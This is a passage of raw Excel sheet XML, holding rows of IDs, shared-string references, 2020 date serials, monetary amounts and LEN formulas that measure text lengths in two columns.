        <f>LEN(J766)</f>
        <v>19</v>
      </c>
    </row>
    <row r="767" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A767">
        <v>17041</v>
      </c>
      <c r="B767">
        <v>2252</v>
      </c>
      <c r="C767" t="s">
        <v>5485</v>
      </c>
      <c r="D767" t="s">
        <v>9637</v>
      </c>
      <c r="E767">
        <v>5</v>
      </c>
      <c r="F767" t="s">
        <v>9577</v>
      </c>
      <c r="G767" s="1">
        <v>43871</v>
      </c>
      <c r="H767">
        <v>80000</v>
      </c>
      <c r="I767" t="s">
        <v>9638</v>
      </c>
      <c r="J767" t="s">
        <v>9639</v>
      </c>
      <c r="K767">
        <f>LEN(I767)</f>
        <v>10</v>
      </c>
      <c r="L767">
        <f>LEN(J767)</f>
        <v>19</v>
      </c>
    </row>
    <row r="768" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A768">
        <v>17045</v>
      </c>
      <c r="B768">
        <v>2252</v>
      </c>
      <c r="C768" t="s">
        <v>5485</v>
      </c>
      <c r="D768" t="s">
        <v>9637</v>
      </c>
      <c r="E768">
        <v>5</v>
      </c>
      <c r="F768" t="s">
        <v>9640</v>
      </c>
      <c r="G768" s="1">
        <v>43871</v>
      </c>
      <c r="H768">
        <v>30000</v>
      </c>
      <c r="I768" t="s">
        <v>9638</v>
      </c>
      <c r="J768" t="s">
        <v>9639</v>
      </c>
      <c r="K768">
        <f>LEN(I768)</f>
        <v>10</v>
      </c>
      <c r="L768">
        <f>LEN(J768)</f>
        <v>19</v>
      </c>
    </row>
    <row r="769" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A769">
        <v>17047</v>
      </c>
      <c r="B769">
        <v>2252</v>
      </c>
      <c r="C769" t="s">
        <v>5485</v>
      </c>
      <c r="D769" t="s">
        <v>9637</v>
      </c>
      <c r="E769">
        <v>5</v>
      </c>
      <c r="F769" t="s">
        <v>3814</v>
      </c>
      <c r="G769" s="1">
        <v>43871</v>
      </c>
      <c r="H769">
        <v>50000</v>
      </c>
      <c r="I769" t="s">
        <v>9638</v>
      </c>
      <c r="J769" t="s">
        <v>9639</v>
      </c>
      <c r="K769">
        <f>LEN(I769)</f>
        <v>10</v>
      </c>
      <c r="L769">
        <f>LEN(J769)</f>
        <v>19</v>
      </c>
    </row>
    <row r="770" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A770">
        <v>17048</v>
      </c>
      <c r="B770">
        <v>2252</v>
      </c>
      <c r="C770" t="s">
        <v>5485</v>
      </c>
      <c r="D770" t="s">
        <v>9637</v>
      </c>
      <c r="E770">
        <v>5</v>
      </c>
      <c r="F770" t="s">
        <v>9641</v>
      </c>
      <c r="G770" s="1">
        <v>43871</v>
      </c>
      <c r="H770">
        <v>60000</v>
      </c>
      <c r="I770" t="s">
        <v>9638</v>
      </c>
      <c r="J770" t="s">
        <v>9639</v>
      </c>
      <c r="K770">
        <f>LEN(I770)</f>
        <v>10</v>
      </c>
      <c r="L770">
        <f>LEN(J770)</f>
        <v>19</v>
      </c>
    </row>
    <row r="771" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A771">
        <v>17050</v>
      </c>
      <c r="B771">
        <v>2252</v>
      </c>
      <c r="C771" t="s">
        <v>5485</v>
      </c>
      <c r="D771" t="s">
        <v>9637</v>
      </c>
      <c r="E771">
        <v>5</v>
      </c>
      <c r="F771" t="s">
        <v>7211</v>
      </c>
      <c r="G771" s="1">
        <v>43871</v>
      </c>
      <c r="H771">
        <v>40000</v>
      </c>
      <c r="I771" t="s">
        <v>9638</v>
      </c>
      <c r="J771" t="s">
        <v>9639</v>
      </c>
      <c r="K771">
        <f>LEN(I771)</f>
        <v>10</v>
      </c>
      <c r="L771">
        <f>LEN(J771)</f>
        <v>19</v>
      </c>
    </row>
    <row r="772" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A772">
        <v>17051</v>
      </c>
      <c r="B772">
        <v>2252</v>
      </c>
      <c r="C772" t="s">
        <v>5485</v>
      </c>
      <c r="D772" t="s">
        <v>9637</v>
      </c>
      <c r="E772">
        <v>5</v>
      </c>
      <c r="F772" t="s">
        <v>9466</v>
      </c>
      <c r="G772" s="1">
        <v>43871</v>
      </c>
      <c r="H772">
        <v>20000</v>
      </c>
      <c r="I772" t="s">
        <v>9638</v>
      </c>
      <c r="J772" t="s">
        <v>9639</v>
      </c>
      <c r="K772">
        <f>LEN(I772)</f>
        <v>10</v>
      </c>
      <c r="L772">
        <f>LEN(J772)</f>
        <v>19</v>
      </c>
    </row>
    <row r="773" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A773">
        <v>17052</v>
      </c>
      <c r="B773">
        <v>2252</v>
      </c>
      <c r="C773" t="s">
        <v>5485</v>
      </c>
      <c r="D773" t="s">
        <v>9637</v>
      </c>
      <c r="E773">
        <v>5</v>
      </c>
      <c r="F773" t="s">
        <v>5434</v>
      </c>
      <c r="G773" s="1">
        <v>43871</v>
      </c>
      <c r="H773">
        <v>10000</v>
      </c>
      <c r="I773" t="s">
        <v>9638</v>
      </c>
      <c r="J773" t="s">
        <v>9639</v>
      </c>
      <c r="K773">
        <f>LEN(I773)</f>
        <v>10</v>
      </c>
      <c r="L773">
        <f>LEN(J773)</f>
        <v>19</v>
      </c>
    </row>
    <row r="774" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A774">
        <v>17056</v>
      </c>
      <c r="B774">
        <v>2252</v>
      </c>
      <c r="C774" t="s">
        <v>5485</v>
      </c>
      <c r="D774" t="s">
        <v>9637</v>
      </c>
      <c r="E774">
        <v>5</v>
      </c>
      <c r="F774" t="s">
        <v>9642</v>
      </c>
      <c r="G774" s="1">
        <v>43871</v>
      </c>
      <c r="H774">
        <v>30000</v>
      </c>
      <c r="I774" t="s">
        <v>9638</v>
      </c>
      <c r="J774" t="s">
        <v>9639</v>
      </c>
      <c r="K774">
        <f>LEN(I774)</f>
        <v>10</v>
      </c>
      <c r="L774">
        <f>LEN(J774)</f>
        <v>19</v>
      </c>
    </row>
    <row r="775" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A775">
        <v>17058</v>
      </c>
      <c r="B775">
        <v>2252</v>
      </c>
      <c r="C775" t="s">
        <v>5485</v>
      </c>
      <c r="D775" t="s">
        <v>9637</v>
      </c>
      <c r="E775">
        <v>5</v>
      </c>
      <c r="F775" t="s">
        <v>9643</v>
      </c>
      <c r="G775" s="1">
        <v>43871</v>
      </c>
      <c r="H775">
        <v>150000</v>
      </c>
      <c r="I775" t="s">
        <v>9638</v>
      </c>
      <c r="J775" t="s">
        <v>9639</v>
      </c>
      <c r="K775">
        <f>LEN(I775)</f>
        <v>10</v>
      </c>
      <c r="L775">
        <f>LEN(J775)</f>
        <v>19</v>
      </c>
    </row>
    <row r="776" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A776">
        <v>16884</v>
      </c>
      <c r="B776">
        <v>306</v>
      </c>
      <c r="C776" t="s">
        <v>119</v>
      </c>
      <c r="D776" t="s">
        <v>9537</v>
      </c>
      <c r="E776">
        <v>14</v>
      </c>
      <c r="F776" t="s">
        <v>9435</v>
      </c>
      <c r="G776" s="1">
        <v>43888</v>
      </c>
      <c r="H776">
        <v>11000</v>
      </c>
      <c r="J776" t="s">
        <v>9544</v>
      </c>
      <c r="K776">
        <f>LEN(I776)</f>
        <v>0</v>
      </c>
      <c r="L776">
        <f>LEN(J776)</f>
        <v>19</v>
      </c>
    </row>
    <row r="777" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A777">
        <v>17414</v>
      </c>
      <c r="B777">
        <v>1240</v>
      </c>
      <c r="C777" t="s">
        <v>2554</v>
      </c>
      <c r="D777" t="s">
        <v>9781</v>
      </c>
      <c r="E777">
        <v>1</v>
      </c>
      <c r="F777" t="s">
        <v>9437</v>
      </c>
      <c r="G777" s="1">
        <v>43910</v>
      </c>
      <c r="H777">
        <v>0</v>
      </c>
      <c r="J777" t="s">
        <v>9639</v>
      </c>
      <c r="K777">
        <f>LEN(I777)</f>
        <v>0</v>
      </c>
      <c r="L777">
        <f>LEN(J777)</f>
        <v>19</v>
      </c>
    </row>
    <row r="778" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A778">
        <v>19655</v>
      </c>
      <c r="B778">
        <v>2126</v>
      </c>
      <c r="C778" t="s">
        <v>4772</v>
      </c>
      <c r="D778" t="s">
        <v>10156</v>
      </c>
      <c r="E778">
        <v>1</v>
      </c>
      <c r="F778" t="s">
        <v>9672</v>
      </c>
      <c r="G778" s="1">
        <v>43868</v>
      </c>
      <c r="H778">
        <v>6000</v>
      </c>
      <c r="J778" t="s">
        <v>9639</v>
      </c>
      <c r="K778">
        <f>LEN(I778)</f>
        <v>0</v>
      </c>
      <c r="L778">
        <f>LEN(J778)</f>
        <v>19</v>
      </c>
    </row>
    <row r="779" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A779">
        <v>20248</v>
      </c>
      <c r="B779">
        <v>385</v>
      </c>
      <c r="C779" t="s">
        <v>841</v>
      </c>
      <c r="D779" t="s">
        <v>10579</v>
      </c>
      <c r="E779">
        <v>14</v>
      </c>
      <c r="F779" t="s">
        <v>9590</v>
      </c>
      <c r="G779" s="1">
        <v>43991</v>
      </c>
      <c r="H779">
        <v>180000</v>
      </c>
      <c r="J779" t="s">
        <v>9639</v>
      </c>
      <c r="K779">
        <f>LEN(I779)</f>
        <v>0</v>
      </c>
      <c r="L779">
        <f>LEN(J779)</f>
        <v>19</v>
      </c>
    </row>
    <row r="780" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A780">
        <v>20249</v>
      </c>
      <c r="B780">
        <v>385</v>
      </c>
      <c r="C780" t="s">
        <v>841</v>
      </c>
      <c r="D780" t="s">
        <v>10579</v>
      </c>
      <c r="E780">
        <v>14</v>
      </c>
      <c r="F780" t="s">
        <v>10580</v>
      </c>
      <c r="G780" s="1">
        <v>43991</v>
      </c>
      <c r="H780">
        <v>180000</v>
      </c>
      <c r="J780" t="s">
        <v>9639</v>
      </c>
      <c r="K780">
        <f>LEN(I780)</f>
        <v>0</v>
      </c>
      <c r="L780">
        <f>LEN(J780)</f>
        <v>19</v>
      </c>
    </row>
    <row r="781" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A781">
        <v>20670</v>
      </c>
      <c r="B781">
        <v>2692</v>
      </c>
      <c r="C781" t="s">
        <v>5941</v>
      </c>
      <c r="D781" t="s">
        <v>10878</v>
      </c>
      <c r="E781">
        <v>29</v>
      </c>
      <c r="F781" t="s">
        <v>4686</v>
      </c>
      <c r="G781" s="1">
        <v>43959</v>
      </c>
      <c r="H781">
        <v>24000</v>
      </c>
      <c r="J781" t="s">
        <v>9544</v>
      </c>
      <c r="K781">
        <f>LEN(I781)</f>
        <v>0</v>
      </c>
      <c r="L781">
        <f>LEN(J781)</f>
        <v>19</v>
      </c>
    </row>
    <row r="782" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A782">
        <v>20671</v>
      </c>
      <c r="B782">
        <v>2692</v>
      </c>
      <c r="C782" t="s">
        <v>5941</v>
      </c>
      <c r="D782" t="s">
        <v>10878</v>
      </c>
      <c r="E782">
        <v>29</v>
      </c>
      <c r="F782" t="s">
        <v>2236</v>
      </c>
      <c r="G782" s="1">
        <v>43959</v>
      </c>
      <c r="H782">
        <v>100000</v>
      </c>
      <c r="J782" t="s">
        <v>9544</v>
      </c>
      <c r="K782">
        <f>LEN(I782)</f>
        <v>0</v>
      </c>
      <c r="L782">
        <f>LEN(J782)</f>
        <v>19</v>
      </c>
    </row>
    <row r="783" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A783">
        <v>20730</v>
      </c>
      <c r="B783">
        <v>881</v>
      </c>
      <c r="C783" t="s">
        <v>3043</v>
      </c>
      <c r="D783" t="s">
        <v>10939</v>
      </c>
      <c r="E783">
        <v>2</v>
      </c>
      <c r="F783" t="s">
        <v>1746</v>
      </c>
      <c r="G783" s="1">
        <v>43994</v>
      </c>
      <c r="H783">
        <v>100000</v>
      </c>
      <c r="J783" t="s">
        <v>9639</v>
      </c>
      <c r="K783">
        <f>LEN(I783)</f>
        <v>0</v>
      </c>
      <c r="L783">
        <f>LEN(J783)</f>
        <v>19</v>
      </c>
    </row>
    <row r="784" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A784">
        <v>20520</v>
      </c>
      <c r="B784">
        <v>2777</v>
      </c>
      <c r="C784" t="s">
        <v>789</v>
      </c>
      <c r="D784" t="s">
        <v>10768</v>
      </c>
      <c r="E784">
        <v>12</v>
      </c>
      <c r="F784" t="s">
        <v>2236</v>
      </c>
      <c r="G784" s="1">
        <v>43952</v>
      </c>
      <c r="H784">
        <v>50000</v>
      </c>
      <c r="I784" t="s">
        <v>9550</v>
      </c>
      <c r="J784" t="s">
        <v>10582</v>
      </c>
      <c r="K784">
        <f>LEN(I784)</f>
        <v>18</v>
      </c>
      <c r="L784">
        <f>LEN(J784)</f>
        <v>18</v>
      </c>
    </row>
    <row r="785" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A785">
        <v>20199</v>
      </c>
      <c r="B785">
        <v>237</v>
      </c>
      <c r="C785" t="s">
        <v>798</v>
      </c>
      <c r="D785" t="s">
        <v>10537</v>
      </c>
      <c r="E785">
        <v>16</v>
      </c>
      <c r="F785" t="s">
        <v>2236</v>
      </c>
      <c r="G785" s="1">
        <v>43921</v>
      </c>
      <c r="H785">
        <v>50000</v>
      </c>
      <c r="J785" t="s">
        <v>10544</v>
      </c>
      <c r="K785">
        <f>LEN(I785)</f>
        <v>0</v>
      </c>
      <c r="L785">
        <f>LEN(J785)</f>
        <v>18</v>
      </c>
    </row>
    <row r="786" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A786">
        <v>20250</v>
      </c>
      <c r="B786">
        <v>385</v>
      </c>
      <c r="C786" t="s">
        <v>841</v>
      </c>
      <c r="D786" t="s">
        <v>10579</v>
      </c>
      <c r="E786">
        <v>14</v>
      </c>
      <c r="F786" t="s">
        <v>10581</v>
      </c>
      <c r="G786" s="1">
        <v>43991</v>
      </c>
      <c r="H786">
        <v>240000</v>
      </c>
      <c r="J786" t="s">
        <v>10582</v>
      </c>
      <c r="K786">
        <f>LEN(I786)</f>
        <v>0</v>
      </c>
      <c r="L786">
        <f>LEN(J786)</f>
        <v>18</v>
      </c>
    </row>
    <row r="787" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A787">
        <v>20728</v>
      </c>
      <c r="B787">
        <v>881</v>
      </c>
      <c r="C787" t="s">
        <v>3043</v>
      </c>
      <c r="D787" t="s">
        <v>10939</v>
      </c>
      <c r="E787">
        <v>2</v>
      </c>
      <c r="F787" t="s">
        <v>10940</v>
      </c>
      <c r="G787" s="1">
        <v>43994</v>
      </c>
      <c r="H787">
        <v>100000</v>
      </c>
      <c r="J787" t="s">
        <v>10544</v>
      </c>
      <c r="K787">
        <f>LEN(I787)</f>
        <v>0</v>
      </c>
      <c r="L787">
        <f>LEN(J787)</f>
        <v>18</v>
      </c>
    </row>
    <row r="788" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A788">
        <v>21081</v>
      </c>
      <c r="B788">
        <v>2837</v>
      </c>
      <c r="C788" t="s">
        <v>7055</v>
      </c>
      <c r="D788" t="s">
        <v>11125</v>
      </c>
      <c r="E788">
        <v>24</v>
      </c>
      <c r="F788" t="s">
        <v>7057</v>
      </c>
      <c r="G788" s="1">
        <v>44081</v>
      </c>
      <c r="H788">
        <v>96000</v>
      </c>
      <c r="J788" t="s">
        <v>10582</v>
      </c>
      <c r="K788">
        <f>LEN(I788)</f>
        <v>0</v>
      </c>
      <c r="L788">
        <f>LEN(J788)</f>
        <v>18</v>
      </c>
    </row>
    <row r="789" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A789">
        <v>19364</v>
      </c>
      <c r="B789">
        <v>766</v>
      </c>
      <c r="C789" t="s">
        <v>307</v>
      </c>
      <c r="D789" t="s">
        <v>9963</v>
      </c>
      <c r="E789">
        <v>16</v>
      </c>
      <c r="F789" t="s">
        <v>9964</v>
      </c>
      <c r="G789" s="1">
        <v>43986</v>
      </c>
      <c r="H789">
        <v>100000</v>
      </c>
      <c r="I789" t="s">
        <v>9965</v>
      </c>
      <c r="J789" t="s">
        <v>9966</v>
      </c>
      <c r="K789">
        <f>LEN(I789)</f>
        <v>11</v>
      </c>
      <c r="L789">
        <f>LEN(J789)</f>
        <v>17</v>
      </c>
    </row>
    <row r="790" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A790">
        <v>20708</v>
      </c>
      <c r="B790">
        <v>374</v>
      </c>
      <c r="C790" t="s">
        <v>1035</v>
      </c>
      <c r="D790" t="s">
        <v>10906</v>
      </c>
      <c r="E790">
        <v>16</v>
      </c>
      <c r="F790" t="s">
        <v>6513</v>
      </c>
      <c r="G790" s="1">
        <v>43966</v>
      </c>
      <c r="H790">
        <v>600000</v>
      </c>
      <c r="I790" t="s">
        <v>10907</v>
      </c>
      <c r="J790" t="s">
        <v>9810</v>
      </c>
      <c r="K790">
        <f>LEN(I790)</f>
        <v>71</v>
      </c>
      <c r="L790">
        <f>LEN(J790)</f>
        <v>16</v>
      </c>
    </row>
    <row r="791" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A791">
        <v>21180</v>
      </c>
      <c r="B791">
        <v>2820</v>
      </c>
      <c r="C791" t="s">
        <v>7097</v>
      </c>
      <c r="D791" t="s">
        <v>11193</v>
      </c>
      <c r="E791">
        <v>33</v>
      </c>
      <c r="F791" t="s">
        <v>6917</v>
      </c>
      <c r="G791" s="1">
        <v>44001</v>
      </c>
      <c r="H791">
        <v>50000</v>
      </c>
      <c r="I791" t="s">
        <v>10642</v>
      </c>
      <c r="J791" t="s">
        <v>11043</v>
      </c>
      <c r="K791">
        <f>LEN(I791)</f>
        <v>48</v>
      </c>
      <c r="L791">
        <f>LEN(J791)</f>
        <v>16</v>
      </c>
    </row>
    <row r="792" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A792">
        <v>21240</v>
      </c>
      <c r="B792">
        <v>582</v>
      </c>
      <c r="C792" t="s">
        <v>476</v>
      </c>
      <c r="D792" t="s">
        <v>11237</v>
      </c>
      <c r="E792">
        <v>29</v>
      </c>
      <c r="F792" t="s">
        <v>4686</v>
      </c>
      <c r="G792" s="1">
        <v>44034</v>
      </c>
      <c r="H792">
        <v>3000</v>
      </c>
      <c r="I792" t="s">
        <v>10334</v>
      </c>
      <c r="J792" t="s">
        <v>9810</v>
      </c>
      <c r="K792">
        <f>LEN(I792)</f>
        <v>48</v>
      </c>
      <c r="L792">
        <f>LEN(J792)</f>
        <v>16</v>
      </c>
    </row>
    <row r="793" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A793">
        <v>21178</v>
      </c>
      <c r="B793">
        <v>2820</v>
      </c>
      <c r="C793" t="s">
        <v>7097</v>
      </c>
      <c r="D793" t="s">
        <v>11193</v>
      </c>
      <c r="E793">
        <v>33</v>
      </c>
      <c r="F793" t="s">
        <v>11194</v>
      </c>
      <c r="G793" s="1">
        <v>44001</v>
      </c>
      <c r="H793">
        <v>30000</v>
      </c>
      <c r="I793" t="s">
        <v>9693</v>
      </c>
      <c r="J793" t="s">
        <v>11043</v>
      </c>
      <c r="K793">
        <f>LEN(I793)</f>
        <v>33</v>
      </c>
      <c r="L793">
        <f>LEN(J793)</f>
        <v>16</v>
      </c>
    </row>
    <row r="794" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A794">
        <v>21179</v>
      </c>
      <c r="B794">
        <v>2820</v>
      </c>
      <c r="C794" t="s">
        <v>7097</v>
      </c>
      <c r="D794" t="s">
        <v>11193</v>
      </c>
      <c r="E794">
        <v>33</v>
      </c>
      <c r="F794" t="s">
        <v>11195</v>
      </c>
      <c r="G794" s="1">
        <v>44001</v>
      </c>
      <c r="H794">
        <v>30000</v>
      </c>
      <c r="I794" t="s">
        <v>9693</v>
      </c>
      <c r="J794" t="s">
        <v>11043</v>
      </c>
      <c r="K794">
        <f>LEN(I794)</f>
        <v>33</v>
      </c>
      <c r="L794">
        <f>LEN(J794)</f>
        <v>16</v>
      </c>
    </row>
    <row r="795" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A795">
        <v>20318</v>
      </c>
      <c r="B795">
        <v>689</v>
      </c>
      <c r="C795" t="s">
        <v>881</v>
      </c>
      <c r="D795" t="s">
        <v>10623</v>
      </c>
      <c r="E795">
        <v>16</v>
      </c>
      <c r="F795" t="s">
        <v>9453</v>
      </c>
      <c r="G795" s="1">
        <v>43980</v>
      </c>
      <c r="H795">
        <v>1000</v>
      </c>
      <c r="I795" t="s">
        <v>10442</v>
      </c>
      <c r="J795" t="s">
        <v>10298</v>
      </c>
      <c r="K795">
        <f>LEN(I795)</f>
        <v>20</v>
      </c>
      <c r="L795">
        <f>LEN(J795)</f>
        <v>16</v>
      </c>
    </row>
    <row r="796" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A796">
        <v>20320</v>
      </c>
      <c r="B796">
        <v>689</v>
      </c>
      <c r="C796" t="s">
        <v>881</v>
      </c>
      <c r="D796" t="s">
        <v>10623</v>
      </c>
      <c r="E796">
        <v>16</v>
      </c>
      <c r="F796" t="s">
        <v>9458</v>
      </c>
      <c r="G796" s="1">
        <v>43980</v>
      </c>
      <c r="H796">
        <v>3000</v>
      </c>
      <c r="I796" t="s">
        <v>10442</v>
      </c>
      <c r="J796" t="s">
        <v>10298</v>
      </c>
      <c r="K796">
        <f>LEN(I796)</f>
        <v>20</v>
      </c>
      <c r="L796">
        <f>LEN(J796)</f>
        <v>16</v>
      </c>
    </row>
    <row r="797" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A797">
        <v>20321</v>
      </c>
      <c r="B797">
        <v>689</v>
      </c>
      <c r="C797" t="s">
        <v>881</v>
      </c>
      <c r="D797" t="s">
        <v>10623</v>
      </c>
      <c r="E797">
        <v>16</v>
      </c>
      <c r="F797" t="s">
        <v>9955</v>
      </c>
      <c r="G797" s="1">
        <v>43980</v>
      </c>
      <c r="H797">
        <v>3000</v>
      </c>
      <c r="I797" t="s">
        <v>10442</v>
      </c>
      <c r="J797" t="s">
        <v>10298</v>
      </c>
      <c r="K797">
        <f>LEN(I797)</f>
        <v>20</v>
      </c>
      <c r="L797">
        <f>LEN(J797)</f>
        <v>16</v>
      </c>
    </row>
    <row r="798" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A798">
        <v>20319</v>
      </c>
      <c r="B798">
        <v>689</v>
      </c>
      <c r="C798" t="s">
        <v>881</v>
      </c>
      <c r="D798" t="s">
        <v>10623</v>
      </c>
      <c r="E798">
        <v>16</v>
      </c>
      <c r="F798" t="s">
        <v>547</v>
      </c>
      <c r="G798" s="1">
        <v>43980</v>
      </c>
      <c r="H798">
        <v>1000</v>
      </c>
      <c r="I798" t="s">
        <v>10194</v>
      </c>
      <c r="J798" t="s">
        <v>10298</v>
      </c>
      <c r="K798">
        <f>LEN(I798)</f>
        <v>18</v>
      </c>
      <c r="L798">
        <f>LEN(J798)</f>
        <v>16</v>
      </c>
    </row>
    <row r="799" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A799">
        <v>19921</v>
      </c>
      <c r="B799">
        <v>235</v>
      </c>
      <c r="C799" t="s">
        <v>486</v>
      </c>
      <c r="D799" t="s">
        <v>10198</v>
      </c>
      <c r="E799">
        <v>16</v>
      </c>
      <c r="F799" t="s">
        <v>6917</v>
      </c>
      <c r="G799" s="1">
        <v>43885</v>
      </c>
      <c r="H799">
        <v>1000</v>
      </c>
      <c r="I799" t="s">
        <v>9746</v>
      </c>
      <c r="J799" t="s">
        <v>9810</v>
      </c>
      <c r="K799">
        <f>LEN(I799)</f>
        <v>13</v>
      </c>
      <c r="L799">
        <f>LEN(J799)</f>
        <v>16</v>
      </c>
    </row>
    <row r="800" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A800">
        <v>20348</v>
      </c>
      <c r="B800">
        <v>899</v>
      </c>
      <c r="C800" t="s">
        <v>2943</v>
      </c>
      <c r="D800" t="s">
        <v>10644</v>
      </c>
      <c r="E800">
        <v>26</v>
      </c>
      <c r="F800" t="s">
        <v>10648</v>
      </c>
      <c r="G800" s="1">
        <v>44088</v>
      </c>
      <c r="H800">
        <v>27364</v>
      </c>
      <c r="I800" t="s">
        <v>9536</v>
      </c>
      <c r="J800" t="s">
        <v>10649</v>
      </c>
      <c r="K800">
        <f>LEN(I800)</f>
        <v>13</v>
      </c>
      <c r="L800">
        <f>LEN(J800)</f>
        <v>16</v>
      </c>
    </row>
    <row r="801" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A801">
        <v>17714</v>
      </c>
      <c r="B801">
        <v>1183</v>
      </c>
      <c r="C801" t="s">
        <v>2579</v>
      </c>
      <c r="D801" t="s">
        <v>9808</v>
      </c>
      <c r="E801">
        <v>16</v>
      </c>
      <c r="F801" t="s">
        <v>9809</v>
      </c>
      <c r="G801" s="1">
        <v>43861</v>
      </c>
      <c r="H801">
        <v>1000</v>
      </c>
      <c r="J801" t="s">
        <v>9810</v>
      </c>
      <c r="K801">
        <f>LEN(I801)</f>
        <v>0</v>
      </c>
      <c r="L801">
        <f>LEN(J801)</f>
        <v>16</v>
      </c>
    </row>
    <row r="802" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A802">
        <v>17715</v>
      </c>
      <c r="B802">
        <v>1183</v>
      </c>
      <c r="C802" t="s">
        <v>2579</v>
      </c>
      <c r="D802" t="s">
        <v>9808</v>
      </c>
      <c r="E802">
        <v>16</v>
      </c>
      <c r="F802" t="s">
        <v>9811</v>
      </c>
      <c r="G802" s="1">
        <v>43861</v>
      </c>
      <c r="H802">
        <v>1000</v>
      </c>
      <c r="J802" t="s">
        <v>9810</v>
      </c>
      <c r="K802">
        <f>LEN(I802)</f>
        <v>0</v>
      </c>
      <c r="L802">
        <f>LEN(J802)</f>
        <v>16</v>
      </c>
    </row>
    <row r="803" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A803">
        <v>17719</v>
      </c>
      <c r="B803">
        <v>1183</v>
      </c>
      <c r="C803" t="s">
        <v>2579</v>
      </c>
      <c r="D803" t="s">
        <v>9808</v>
      </c>
      <c r="E803">
        <v>16</v>
      </c>
      <c r="F803" t="s">
        <v>9812</v>
      </c>
      <c r="G803" s="1">
        <v>43861</v>
      </c>
      <c r="H803">
        <v>2000</v>
      </c>
      <c r="J803" t="s">
        <v>9810</v>
      </c>
      <c r="K803">
        <f>LEN(I803)</f>
        <v>0</v>
      </c>
      <c r="L803">
        <f>LEN(J803)</f>
        <v>16</v>
      </c>
    </row>
    <row r="804" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A804">
        <v>19876</v>
      </c>
      <c r="B804">
        <v>984</v>
      </c>
      <c r="C804" t="s">
        <v>2804</v>
      </c>
      <c r="D804" t="s">
        <v>10297</v>
      </c>
      <c r="E804">
        <v>17</v>
      </c>
      <c r="F804" t="s">
        <v>512</v>
      </c>
      <c r="G804" s="1">
        <v>43916</v>
      </c>
      <c r="H804">
        <v>5000</v>
      </c>
      <c r="J804" t="s">
        <v>10298</v>
      </c>
      <c r="K804">
        <f>LEN(I804)</f>
        <v>0</v>
      </c>
      <c r="L804">
        <f>LEN(J804)</f>
        <v>16</v>
      </c>
    </row>
    <row r="805" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A805">
        <v>20356</v>
      </c>
      <c r="B805">
        <v>2690</v>
      </c>
      <c r="C805" t="s">
        <v>5843</v>
      </c>
      <c r="D805" t="s">
        <v>10652</v>
      </c>
      <c r="E805">
        <v>17</v>
      </c>
      <c r="F805" t="s">
        <v>512</v>
      </c>
      <c r="G805" s="1">
        <v>43917</v>
      </c>
      <c r="H805">
        <v>151105</v>
      </c>
      <c r="J805" t="s">
        <v>10298</v>
      </c>
      <c r="K805">
        <f>LEN(I805)</f>
        <v>0</v>
      </c>
      <c r="L805">
        <f>LEN(J805)</f>
        <v>16</v>
      </c>
    </row>
    <row r="806" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A806">
        <v>20869</v>
      </c>
      <c r="B806">
        <v>2547</v>
      </c>
      <c r="C806" t="s">
        <v>16328</v>
      </c>
      <c r="D806" t="s">
        <v>16329</v>
      </c>
      <c r="E806">
        <v>14</v>
      </c>
      <c r="F806" t="s">
        <v>6569</v>
      </c>
      <c r="G806" s="1">
        <v>43979</v>
      </c>
      <c r="H806">
        <v>43781.9</v>
      </c>
      <c r="J806" t="s">
        <v>11043</v>
      </c>
      <c r="K806">
        <f>LEN(I806)</f>
        <v>0</v>
      </c>
      <c r="L806">
        <f>LEN(J806)</f>
        <v>16</v>
      </c>
    </row>
    <row r="807" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A807">
        <v>20870</v>
      </c>
      <c r="B807">
        <v>2547</v>
      </c>
      <c r="C807" t="s">
        <v>16328</v>
      </c>
      <c r="D807" t="s">
        <v>16329</v>
      </c>
      <c r="E807">
        <v>14</v>
      </c>
      <c r="F807" t="s">
        <v>3673</v>
      </c>
      <c r="G807" s="1">
        <v>43979</v>
      </c>
      <c r="H807" s="3" t="s">
        <v>16238</v>
      </c>
      <c r="J807" t="s">
        <v>11043</v>
      </c>
      <c r="K807">
        <f>LEN(I807)</f>
        <v>0</v>
      </c>
      <c r="L807">
        <f>LEN(J807)</f>
        <v>16</v>
      </c>
    </row>
    <row r="808" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A808">
        <v>20643</v>
      </c>
      <c r="B808">
        <v>520</v>
      </c>
      <c r="C808" t="s">
        <v>1123</v>
      </c>
      <c r="D808" t="s">
        <v>16330</v>
      </c>
      <c r="E808">
        <v>16</v>
      </c>
      <c r="F808" t="s">
        <v>2236</v>
      </c>
